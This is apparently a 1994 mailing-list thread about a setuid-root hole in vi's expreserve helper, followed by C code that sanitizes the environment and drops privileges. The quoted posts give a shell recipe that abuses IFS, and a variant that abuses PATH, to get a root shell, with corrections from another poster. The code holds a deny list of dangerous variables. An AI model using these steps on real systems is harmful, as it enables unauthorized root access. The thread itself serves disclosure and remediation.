Charles Howes writes:

> On Sun, 16 Oct 1994, Chris Ellwood wrote:
> > Charles Howes said...
> > > ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
> > > versions). Expreserve is setuid root. Expreserve runs /bin/mail
> > > with 'system()'. So, do the following:
> > > % cd /tmp
> > > % cp /bin/sh fubar
> > > % cat > bin
> > > chmod 4755 fubar
> > > ^D
> > > % chmod u+x fubar
> >
> > I see a couple problems with the script so far. /bin/sh was copied
> > to fubar while you are a regular user, so it will be owned by you
> > and you'll end up with a nice copy of /bin/sh that's setuid to you,
> > not your target user. Also, that last line should probably read
> > 'chmod u+x bin', not fubar.
>
> Ooops, forgot the chown. Sigh. Trust memory to lose things.
>
> > > % setenv IFS=/
> > > % vi
> > > :pre
> > > :q
> > > % fubar
> > > #
> > > Some versions of expreserve don't have the hole.
> > > Some versions of vi don't have the :pre command.
> > > One does not imply the other.

Better still are the versions of expreserve that do a system("mkdir ....");
Create a file called "mkdir" and put "." in your path.

Just out of interest, what is needed to make it safe? Is making it
non-setuid/setgid and /usr/preserve mode 1777 sufficient? Is there any
way of subverting the "expreserve -" from the boot scripts?

-Peter
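Both holes in the thread have the same root cause: a setuid root program hands an inherited environment (IFS, PATH) to system(), so the caller decides what "mail" or "mkdir" resolves to. The following C example is added here to illustrate the fix a privileged program should apply before spawning anything; it is not expreserve's code and does not come from the thread. It assumes /bin/sh exists at that path and treats the list of environment names as a reasonable minimum, not a complete one. The child is started with execve on an absolute path, a fixed argv, a fixed environment and the real user's uid/gid, so no shell ever parses attacker-controlled text and no privileged process searches PATH.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Environment variables that steer name resolution in a shell or the
 * dynamic loader. A setuid program that inherits any of these from its
 * caller and then calls system() lets the caller choose what "mail" or
 * "mkdir" resolves to. (Assumed minimum list, not exhaustive.) */
static const char *const DANGEROUS_ENV[] = {
    "IFS", "PATH", "ENV", "BASH_ENV", "LD_PRELOAD", "LD_LIBRARY_PATH", NULL
};

/* Fixed environment handed to every child: no IFS at all, and a PATH the
 * caller cannot influence (and that never contains "."). */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Return 1 if NAME is a variable a privileged program must not inherit. */
int env_var_is_dangerous(const char *name)
{
    for (const char *const *p = DANGEROUS_ENV; *p; p++)
        if (strcmp(name, *p) == 0)
            return 1;
    return 0;
}

/* Count dangerous entries in a NULL-terminated "NAME=value" array such as
 * the environ a setuid program was started with: an audit check to run
 * (and log) before anything is spawned. */
int count_dangerous_env(char *const envp[])
{
    int n = 0;
    for (char *const *e = envp; *e; e++) {
        const char *eq = strchr(*e, '=');
        size_t len = eq ? (size_t)(eq - *e) : strlen(*e);
        char name[64];
        if (len >= sizeof name)
            continue;               /* nothing on the list is that long */
        memcpy(name, *e, len);
        name[len] = '\0';
        n += env_var_is_dangerous(name);
    }
    return n;
}

/* Give up setuid/setgid privileges permanently. Returns 0 on success. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0) return -1;
    if (setuid(getuid()) != 0) return -1;
    return 0;
}

/* Spawn PATH with ARGV directly: no shell, so IFS is never consulted and
 * the command line is never re-parsed; fixed environment; real user's
 * credentials. PATH must be absolute because nothing searches $PATH.
 * Returns the child's exit status, or -1 on error with errno set. */
int run_unprivileged(const char *path, char *const argv[])
{
    if (path == NULL || path[0] != '/') {
        errno = EINVAL;
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(126);
        execve(path, argv, SAFE_ENV);
        _exit(127);                 /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample of the environment a caller might supply. */
    char *const hostile[] = { "IFS=/", "PATH=.:/bin", "HOME=/tmp", NULL };
    printf("dangerous variables in caller's env: %d\n",
           count_dangerous_env(hostile));

    /* Where expreserve would notify the user, a privileged program would
     * pass "/bin/mail" here; /bin/echo stands in so this runs anywhere. */
    char *const argv[] = { "echo", "recovery file saved", NULL };
    printf("child exit status: %d\n", run_unprivileged("/bin/echo", argv));
    return 0;
}
```

Dropping the setuid bit and making the preserve directory 1777, as Peter suggests, removes the privilege; the pattern above is for the case where the program must keep it, and the two are complementary rather than alternatives. The audit counter is worth keeping even after the fix: a nonzero count on a setuid entry point is a cheap thing to log.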